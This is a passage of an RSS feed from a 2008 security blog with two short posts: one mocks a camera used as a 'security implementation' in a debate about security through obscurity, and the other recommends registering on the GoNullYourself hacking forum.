		<link>http://insanesecurity.wordpress.com/2008/06/15/this-is-just-plain-dumb/</link>
		<comments>http://insanesecurity.wordpress.com/2008/06/15/this-is-just-plain-dumb/#comments</comments>
		<pubDate>Sun, 15 Jun 2008 17:31:11 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
		
		<category><![CDATA[random - category]]></category>

		<category><![CDATA[camera]]></category>

		<category><![CDATA[dumb]]></category>

		<category><![CDATA[stupidity]]></category>

		<guid isPermaLink="false">http://insanesecurity.wordpress.com/?p=47</guid>
		<description><![CDATA[Many times poeple criticise me for being a security through obscurity fanclub member, thus saying that it can do no good, grow out of it and stuff like that&#8230; But I never said I used security through obscurity as a basic security implementation (wtf?! do you think I work for MS?)&#8230; Anyway for those who [...]]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Many times poeple criticise me for being a security through obscurity fanclub member, thus saying that it can do no good, grow out of it and stuff like that&#8230; But I never said I used security through obscurity as a basic security implementation (wtf?! do you think I work for MS?)&#8230; Anyway for those who criticise me what would they say about the following &#8220;security implementation&#8221; (yeah right)&#8230;.<br />
<img src="http://img67.imageshack.us/img67/646/camgr6.jpg"/><br />
I think big brother&#8217;s watching me &#8230;.</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/insanesecurity.wordpress.com/47/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/insanesecurity.wordpress.com/47/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/insanesecurity.wordpress.com/47/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/insanesecurity.wordpress.com/47/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/insanesecurity.wordpress.com/47/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/insanesecurity.wordpress.com/47/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/insanesecurity.wordpress.com/47/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/insanesecurity.wordpress.com/47/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/insanesecurity.wordpress.com/47/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/insanesecurity.wordpress.com/47/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/insanesecurity.wordpress.com/47/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/insanesecurity.wordpress.com/47/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=insanesecurity.wordpress.com&blog=1442538&post=47&subd=insanesecurity&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.wordpress.com/2008/06/15/this-is-just-plain-dumb/feed/</wfw:commentRss>
	
		<media:content url="http://a.wordpress.com/avatar/dblackshell-128.jpg" medium="image">
			<media:title type="html">dblackshell</media:title>
		</media:content>
	</item>
		<item>
		<title>planting crops</title>
		<link>http://insanesecurity.wordpress.com/2008/06/15/planting-crops/</link>
		<comments>http://insanesecurity.wordpress.com/2008/06/15/planting-crops/#comments</comments>
		<pubDate>Sun, 15 Jun 2008 07:30:28 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
		
		<category><![CDATA[is - news]]></category>

		<category><![CDATA[forum]]></category>

		<category><![CDATA[gonullyourself]]></category>

		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://insanesecurity.wordpress.com/?p=46</guid>
		<description><![CDATA[Recently affiliated with Darknet I have found GoNullYourself which came in with a non skiddies aproach (you got to give&#8217;em some credit for that)&#8230; anyway they have decided to make posible public registration to their forum, and If you may want to take a look an register throw in my handle as a refferal&#8230; ^_^
Why [...]]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Recently affiliated with <a href="http://www.darknet.org.uk">Darknet</a> I have found <a href="http://gonullyourself.org">GoNullYourself</a> which came in with a non skiddies aproach (you got to give&#8217;em some credit for that)&#8230; anyway they have decided to make posible public registration to their <a href="http://gonullyourself.org/forum">forum</a>, and If you may want to take a look an register throw in my handle as a refferal&#8230; ^_^</p>
<p>Why this article? Because nowadays can&#8217;t really find a good quality forum&#8230; or can be found but sooner or later they become inactive&#8230; got some hopes in this null identity&#8230;</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/insanesecurity.wordpress.com/46/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/insanesecurity.wordpress.com/46/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/insanesecurity.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/insanesecurity.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/insanesecurity.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/insanesecurity.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/insanesecurity.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/insanesecurity.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/insanesecurity.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/insanesecurity.wordpress.com/46/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/insanesecurity.wordpress.com/46/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/insanesecurity.wordpress.com/46/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=insanesecurity.wordpress.com&blog=1442538&post=46&subd=insanesecurity&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.wordpress.com/2008/06/15/planting-crops/feed/</wfw:commentRss>
	
		<media:content url="http://a.wordpress.com/avatar/dblackshell-128.jpg" medium="image">
			<media:title type="html">dblackshell</media:title>
		</media:content>
	</item>
	</channel>
</rss>